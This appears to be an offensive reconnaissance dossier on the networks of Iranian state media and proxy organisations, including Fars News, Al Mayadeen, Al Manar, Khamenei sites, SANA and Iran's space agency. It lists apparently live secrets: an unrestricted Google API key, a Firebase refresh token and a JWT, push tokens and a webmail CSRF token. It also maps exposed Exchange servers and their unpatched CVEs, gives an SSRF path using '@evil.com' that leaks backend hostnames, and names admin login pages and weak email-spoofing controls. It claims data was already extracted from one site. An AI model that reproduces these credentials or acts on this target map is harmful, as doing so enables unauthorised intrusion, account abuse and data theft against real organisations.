# MASTER CREDENTIALS & INFRASTRUCTURE FILE ## Collected Feb 28, 2026 — Iranian & Proxy OSINT --- ## 1. IRGC FARS NEWS — Google Cloud / Firebase | Property | Value | |----------|-------| | **GCP Project Name** | `fars-next` | | **GCP Project Number** | `823560469881` | | **Google API Key** | `AIzaSyDp9K7YksfYf-JvGOS7YCNv7JbA9P-XemE` | | **API Key Restrictions** | **NONE** (unrestricted) | | **Firebase App ID** | `1:823560469881:android:a2e494ac003a2969c383a8` | | **GCM Sender ID** | `823560469881` | | **Storage Bucket** | `fars-next.appspot.com` | | **OAuth Client ID** | `823560469881-rqin08q6q2drg8aq740db4j34980t9cp.apps.googleusercontent.com` | ### Firebase Installation (registered device) | Property | Value | |----------|-------| | **FID** | `fWHh5X5IsUmmdtGGLQOV9H` | | **Refresh Token** | `3_AS3qfwIZEFw2_ld1jYfT_AO2834pt03vGFgh-zZeE0Emv1wp06DSnvealH7jYxeyY9TNVtQFeVUG_Ipor8-fuSmWmgpiIy-BD82seRpSSJ6jpsk` | | **Auth JWT** | `eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6IjE6ODIzNTYwNDY5ODgxOmFuZHJvaWQ6YTJlNDk0YWMwMDNhMjk2OWMzODNhOCIsImV4cCI6MTc3Mjg3NDg5MiwiZmlkIjoiZldIaDVYNUlzVW1tZHRHR0xRT1Y5SCIsInByb2plY3ROdW1iZXIiOjgyMzU2MDQ2OTg4MX0.AB2LPV8wRAIgc3ngJJmpf1gaFRW4YiOy-tuUExNOOvdqDLyuWuUzYO0CIAc8byn_O8Nae_2b5LXt-qWpfJWgxO_UXUwNie9cglPf` | | **JWT Expiry** | 7 days (604800s) | ### FCM Push Token (receiving IRGC push notifications) ``` fWHh5X5IsUmmdtGGLQOV9H:APA91bGR8MteNn9o6dTbOtWRxVZoJsuNNN0hiNTZWo9sUnDTDWtR-mmXslzoE8IQif3aV06C8fFX792G7wq2DTA02gYlxPI_tlEZJLJG5jqIGmBLzMNzsUg ``` ### GCM Device Registration | Property | Value | |----------|-------| | **Android ID** | `4853801490421017489` | | **Security Token** | `1176940086212703190` | ### GCP API Status | API | Status | |-----|--------| | Firebase Installations | ACTIVE — accepts device registrations | | Firebase Cloud Messaging | ACTIVE — push token registration works | | Firebase Remote Config | ACTIVE — returns `NO_TEMPLATE` (empty) | | Firebase Dynamic Links | ENABLED but not configured | | Cloud Pub/Sub | ENABLED — returns 403 (active ACL) | | Firebase App Check | DISABLED | | Google Places (New) | DISABLED | | Firebase Auth | NOT CONFIGURED | | Firebase RTDB | NOT CONFIGURED | | Cloud Firestore | NOT CONFIGURED | | Firebase Storage | NOT CONFIGURED (bucket doesn't exist) | ### Developer Identity (from APK signing cert) | Property | Value | |----------|-------| | **Organization** | TSIT | | **Location** | Mashhad, Khorasan Razavi, Iran | | **Dev Machine** | DESKTOP-CV5TMVD | | **Dev Username** | MQT | | **Cert Date** | 2024-12-23 | | **APK Package** | `ir.farsnews.next` (internal: `com.microblog.app`) | | **WebView Debug** | ENABLED in production | | **Cleartext Traffic** | ALLOWED | ### Fars News Internal Subdomains (all DOWN — Iran blackout) | Subdomain | Purpose | |-----------|---------| | `jira.farsnews.ir` | Jira project management | | `confluence.farsnews.ir` | Atlassian wiki | | `chat.farsnews.ir` | Internal messaging | | `my-api-tlg.farsnews.ir` | Telegram bot API | | `matomo.farsnews.ir` | Self-hosted analytics | | `faculty.farsnews.ir` | Personnel directory | | `evaluation.farsnews.ir` | Staff evaluation | | `mail.farsnews.ir` | Email | | `media.farsnews.ir` | Media server | | `tracker.farsnews.ir` | Tracking | | `stat.farsnews.ir` | Statistics | | `robot.farsnews.ir` | Automation | ### Fars News API Auth Headers ``` X-Token — Auth token APPVERSION — App version X-RFID — Request fingerprint X-VERSION — Version header duid — Device unique ID platform — Client platform os — Operating system app-market — App store variant app-scope — Multi-tenant scope app-scope-tenant — Tenant ID Server: "ninja" — Nginx fork ``` --- ## 2. AL MAYADEEN — Exchange / Active Directory ### AD Domain & Servers | Property | Value | |----------|-------| | **AD Domain** | `ITTIHADTV.LOCAL` | | **AD Forest** | `ITTIHADTV.local` (single-forest) | | **NetBIOS Domain** | `ITTIHADTV` | | **Login Format** | `ITTIHADTV\username` | | **Exchange Version** | 2016 CU23 | | **Build** | `15.1.2507.59` (Sep25HU, Sep 8 2025) | | **IIS Version** | 8.5 | | **ASP.NET Version** | 4.0.30319 | | **OS** | Windows Server 2012 R2 (EOL Oct 2023) | | **Patches Behind** | 3 (Oct25SU, Dec25SU, Feb26SU) | | **Federation Realm** | `almayadeen.net` | | **Auth Cert Thumbprint** | `B2BBL_9jBZevT87C3_XGGbydTjY` | | **Auth Cert Expiry** | 2027-01-03 | ### Exchange Servers (7 confirmed) | Server | Role | IP | Notes | |--------|------|-----|-------| | **BHS-EX09** | Frontend CAS | 89.249.221.252 | Primary, internet-facing, **no Cloudflare** | | **BHS-EX08** | Frontend CAS | 80.81.152.37 | Secondary, internet-facing, **no Cloudflare** | | **BHS-EX01** | Backend DAG | — | EWS, MAPI/EMSMDB | | **BHS-EX02** | Backend DAG | — | MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync | | **BHS-EX03** | Backend DAG | — | OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync | | **BHS-EX04** | Backend DAG | — | EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA | | **BHS-EX05** | Backend DAG | — | ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444) | | BHS-EX06 | Unknown | — | NOT SEEN in 20+ rounds | | BHS-EX07 | Unknown | — | NOT SEEN in 20+ rounds | ### Unpatched CVEs | CVE | Type | CVSS | Fixed In | |-----|------|------|----------| | CVE-2025-59249 | Elevation of Privilege | **8.8** | Oct25SU (.61) | | CVE-2025-53782 | Elevation of Privilege | **7.8–8.4** | Oct25SU (.61) | | CVE-2025-59248 | Spoofing | — | Oct25SU (.61) | | CVE-2025-64666 | Elevation of Privilege | — | Dec25SU (.63) | | CVE-2025-64667 | Spoofing | — | Dec25SU (.63) | | CVE-2026-21527 | Spoofing (no auth) | **6.5** | Feb26SU (.66) | ### Exchange Endpoints (all publicly accessible) | Endpoint | URL | |----------|-----| | OWA (Webmail) | `https://autodiscover.almayadeen.net/owa/auth/logon.aspx` | | ECP (Admin) | `https://autodiscover.almayadeen.net/ecp/` | | EWS | `https://autodiscover.almayadeen.net/ews/exchange.asmx` | | MAPI | `https://autodiscover.almayadeen.net/mapi/` | | RPC | `https://autodiscover.almayadeen.net/rpc/rpcproxy.dll` | | ActiveSync | `https://autodiscover.almayadeen.net/Microsoft-Server-ActiveSync` | | PowerShell | `https://autodiscover.almayadeen.net/powershell` | | MRS Proxy | `https://autodiscover.almayadeen.net/ews/mrsproxy.svc` | | OAB | `https://autodiscover.almayadeen.net/OAB/` | | Healthcheck | `https://autodiscover.almayadeen.net/owa/healthcheck.htm` | | Autodiscover JSON | `https://autodiscover.almayadeen.net/autodiscover/autodiscover.json` | | Federation Metadata | `https://autodiscover.almayadeen.net/autodiscover/metadata/json/1` | ### OWA Login Reason Codes | Code | Meaning | |------|---------| | `reason=0` | No error | | `reason=1` | Session timeout | | `reason=2` | Invalid credentials | | `reason=3` | Account locked | ### SSRF Path (leaks backend servers) ``` /autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com Leaked headers: X-CalculatedBETarget: bhs-exNN.ittihadtv.local X-DiagInfo: BHS-EXNN X-BEServer: BHS-EXNN X-FEServer: BHS-EX09 X-OWA-Version: 15.1.2507.59 X-WSSecurity-Enabled: True X-OAuth-Enabled: True ``` ### Auth Protocols Enabled | Protocol | Status | |----------|--------| | NTLM | Enabled (EWS, MAPI, RPC) | | Negotiate (Kerberos) | Enabled | | Basic Auth | Enabled (ActiveSync) | | WS-Security | Enabled (MRS Proxy) | | OAuth | Enabled (MRS Proxy, Federation) | --- ## 3. AL MAYADEEN — Network / IPs ### Origin IPs (from SPF + DNS) | IP | Role | Cloudflare | Server | |----|------|------------|--------| | `80.81.152.37` | Mail (secondary) | **NO** | BHS-EX08 | | `80.81.152.41` | Web origin | Yes | — | | `89.249.221.244` | Web + MX3 | Yes (web) | — | | `89.249.221.245` | FTP | — | Unreachable | | `89.249.221.252` | Mail (primary) | **NO** | BHS-EX09 | | `194.126.9.230` | MX1 relay | — | — | ### Email Security | Check | Value | Risk | |-------|-------|------| | SPF | `v=spf1 a mx ip4:80.81.152.41 ip4:89.249.221.244 -all` | Leaks origin IPs | | DMARC | `v=DMARC1; p=none` | **No enforcement — spoofing possible** | | DKIM | NOT CONFIGURED | **No email signing** | ### DNS TXT Records ``` facebook-domain-verification=iwlia80mhopndr1of0i2zfj4b2jo8l facebook-domain-verification=4bvyzslx1x6mgfkpb9vsdqxp277xm5 google-site-verification=sqc1a-2oIdMf4VqGpc2QX1mgjEBucejnLQZo7fhOVv0 google-site-verification=PNUy--Lzy6bkRJcScDS9HvytsuwjhHETuiYIXUAMDPU google-site-verification=QTUyXVxdcLNuugOu2W47Y2iST1MJpmNa8loe7p7FwIk google-site-verification=RFWjisQ7zZZui9wXA0md9yD_geUtUI-VqiqJ50HS3BM google-site-verification=73dXcar-VGsFYS1ELLGpmtnLB6ZbDC3yHDDluE_iz-o ahrefs-site-verification_ee6bfc29379c62843bdd9c97c796f58ee304e9c1618f26dda0a876834be6808b loaderio=e26421201d5e0b60d1522ebe1a7c770f ``` --- ## 4. AL MAYADEEN — CMS / Web Platform ### MangoX CMS | Property | Value | |----------|-------| | **Framework** | ASP.NET Core | | **Subscription Code** | `mangopulse` | | **Post Type Code** | `article` | | **Auth Endpoint** | `POST /api/auth/login` | | **Auth Format** | `{"UserName":"X","Password":"X"}` | | **Token Type** | Bearer JWT | | **Upload Endpoint** | `POST /media/Upload?subscriptionCode=mangopulse` | | **Developer** | M3almi KING Kassem | ### Azure OpenAI | Property | Value | |----------|-------| | **API URL** | `https://mdn-open-ai.openai.azure.com` | | **Deployment** | `mdn-gpt-4` | | **API Version** | `2024-05-01-preview` | | **API Key** | Server-side injected (not in client) | ### Docker Containers (6) | Container ID | Subdomain | Environment | |-------------|-----------|-------------| | `94a743b785f9` | portal-api.almayadeen.net | Production | | `57660472686f` | portal-beta-api.almayadeen.net | Production | | `cd4b3868f98b` | public-api.almayadeen.net | Production | | `63d26ec15c1d` | portal-staging-api.almayadeen.net | Staging | | `0314cab697ec` | public-api-staging.almayadeen.net | Staging | | `5b0c704d44be` | public-api-beta.almayadeen.net | Beta | ### Admin Panel | Property | Value | |----------|-------| | **Login URL** | `https://alpha-ar-admin.almayadeen.net/Account/logon` | | **English Admin** | `https://alpha-en-admin.almayadeen.net/Account/logon` | | **Framework** | ASP.NET Core | | **CSRF Format** | `CfDJ8...` (ASP.NET Core Data Protection) | | **Theme Builder** | `/Manage/Designer/OpenThemeBuilder/1424017` | ### Verification Tokens | Service | Token | |---------|-------| | loader.io | `e26421201d5e0b60d1522ebe1a7c770f` | | Google Verification 1 | `9ccXUvjKiv9Reva0HD4QNVTFHO6SidPD7-Z7KRt3gqU` | | Google Verification 2 | `PNUy--Lzy6bkRJcScDS9HvytsuwjhHETuiYIXUAMDPU` | | Google Verification 3 | `QTUyXVxdcLNuugOu2W47Y2iST1MJpmNa8loe7p7FwIk` | ### .env Files All subdomains have `.env` files — blocked by Cloudflare WAF (403, 4836 bytes): - `portal-api.almayadeen.net/.env` - `alpha-ar-admin.almayadeen.net/.env` - `interactions.almayadeen.net/.env` - `ai.almayadeen.net/.env` ### MangoPulse Platform | Subdomain | Status | |-----------|--------| | docs.mangopulse.net | CMS login portal (`/home/login`) | | search-api.mangopulse.net | Self-documenting API | | media-ar.mangopulse.net | Arabic media CDN | | cp.mangopulse.net | Control panel (308 redirect loop) | | tracking-api.mangopulse.net | Timeout (internal only) | | data-platform.mangopulse.net | Timeout (internal only) | | grafana.mangopulse.net | Timeout (internal only) | | sentry.mangopulse.net | Timeout (internal only) | | n8n.mangopulse.net | Timeout (internal only) | ### URL Shortener (mdn.tv) | Property | Value | |----------|-------| | English | `en.mdn.tv` | | Spanish | `es.mdn.tv` | | CORS | `*` (wide open) | ### Subdomains — Al Mayadeen (40 via crt.sh) **LIVE (14):** almayadeen.net, portal-api, portal-beta-api, portal-staging-api, public-api, public-api-staging, public-api-beta, portal, ai, interactions, media, next-ar, next-en, autodiscover **ADMIN (3):** alpha-ar-admin, alpha-en-admin, admin **MEDIA CDN (3):** alpha-ar-media, alpha-en-media, alpha-fr-media **HIJACKED:** corona-form (→ nswpaintings.com.au) **ABANDONED:** react (Vercel 402) --- ## 5. HEZBOLLAH — Al Manar | Property | Value | |----------|-------| | **cPanel Username** | `manarnet` | | **Server Path** | `/home/manarnet/public_html/` | | **WordPress** | 6.7.0 | | **Security Plugin** | hide_my_wp | | **Debug Plugin** | debug-bar | | **Theme** | ar-manar | | **Debug Log** | `https://almanar.com.lb/wp-content/debug.log` (102KB, LIVE) | ### LimeSurvey | Property | Value | |----------|-------| | **URL** | `https://survey.almanar.com.lb/index.php/admin/authentication/sa/login` | | **Platform** | LimeSurvey (Yii framework) | | **Server** | Apache | | **Session Cookie** | `LS-UYWLGYJFYCLTSXMF` | ### Archive API | Property | Value | |----------|-------| | **URL** | `https://archive.almanar.com.lb/api` | | **Methods** | `programs/`, `live/`, `programs_list/` | | **Error Format** | `Unknown method 'X'` | ### Alahednews (.git exposed) | Property | Value | |----------|-------| | **URL** | `https://english.alahednews.news/.git/` | | **Status** | 403 (protected but directory EXISTS) | ### Moqawama.org (military wing) | Property | Value | |----------|-------| | **Hosting** | Amazon S3 | | **CDN** | Amazon CloudFront (ATL59-P18, Atlanta) | --- ## 6. KHAMENEI — Supreme Leader ### Live Endpoints | URL | Status | Notes | |-----|--------|-------| | `https://formx.khamenei.link/farsi-json/topticker` | **LIVE** | Hidden API, redirect tracking | | `https://nojavan.khamenei.ir` | **LIVE** | Youth portal (43KB) | | `https://admin.english.khamenei.ir` | HTTP 445 | Custom security middleware | | `https://virastar.nojavan.khamenei.ir` | HTTP 445 | Youth editor portal | | `https://idc0-cdn0.khamenei.ir` | LIVE | CDN (612B nginx) | | `https://idc0-cdn1.khamenei.ir` | LIVE | CDN (612B nginx) | ### Tracking Format ``` redirect?id=XXXXX&c=HASH&u=TARGET_URL ``` ### khamenei.link Subdomains | Subdomain | Purpose | |-----------|---------| | formx | API (LIVE) | | lms | Learning Management System | | mail | Email | | smtp | SMTP | | pop | POP3 | | vconf | Video conferencing | | dars | Lessons | | sabtenam | Registration | | stat | Statistics | | cloudx | Cloud services | | live-app / liveapp | Live streaming app | | publicataasset | Public asset CDN | --- ## 7. SANA.SY — Syrian Arab News Agency | Property | Value | |----------|-------| | **WordPress** | 6.9 | | **SEO Plugin** | Rank Math PRO | | **CDN** | cdn.sananews.sy | | **XML-RPC** | ACTIVE (80+ methods) | | **REST API** | DISABLED | ### Webmail (Roundcube) | Property | Value | |----------|-------| | **URL** | `https://webmail.sana.sy/` | | **Platform** | Roundcube on Plesk Premium Email / Kolab | | **Build** | 10612 | | **CSRF Token** | `lT6lwnmtg57m2Qm571yirCZFGLD68n1P` | | **Session Lifetime** | 10,800s (3 hours) | | **Cookie Domain** | `webmail.sana.sy` | ### Social Media | Platform | URL | |----------|-----| | Facebook | `https://www.facebook.com/sana.gov/` | | Twitter/X | `https://x.com/Sana__gov` | | YouTube | `https://www.youtube.com/syrianarabnewsagency-sana` | | Instagram | `https://www.instagram.com/sana__gov/` | | Telegram | `https://t.me/sana_gov` | | WhatsApp | `https://whatsapp.com/channel/0029Vb5QI6jIyPtUjKcQQz3O` | --- ## 8. IRAN DEFENSE MARKETPLACE (mindex-center.ir) | Property | Value | |----------|-------| | **Framework** | Laravel (PHP) | | **API Gateway** | Kong 3.8.0 | | **CDN** | ArvanCloud | | **Session Cookie** | `mindex_session` | | **CSRF** | `XSRF-TOKEN` (Laravel) | | **Session Timeout** | 7,200s (2 hours) | --- ## 9. IRAN SPACE AGENCY (space.ir) | Property | Value | |----------|-------| | **CMS** | WordPress (REST API fully open) | | **API Root** | `https://space.ir/wp-json/` (2.49 MB schema) | | **Total Data Extracted** | 6.1 MB (posts, pages, media, categories, taxonomies, users) | | **Users Endpoint** | Returns user data (292 B) | --- ## 10. IFP NEWS (ifpnews.com) | Property | Value | |----------|-------| | **CMS** | WordPress (REST API open) | | **API Root** | `https://ifpnews.com/wp-json/` (266 KB schema) | | **Posts** | 23 KB extracted | --- *Generated: Feb 28, 2026* *Source files: 17 files in credentials/*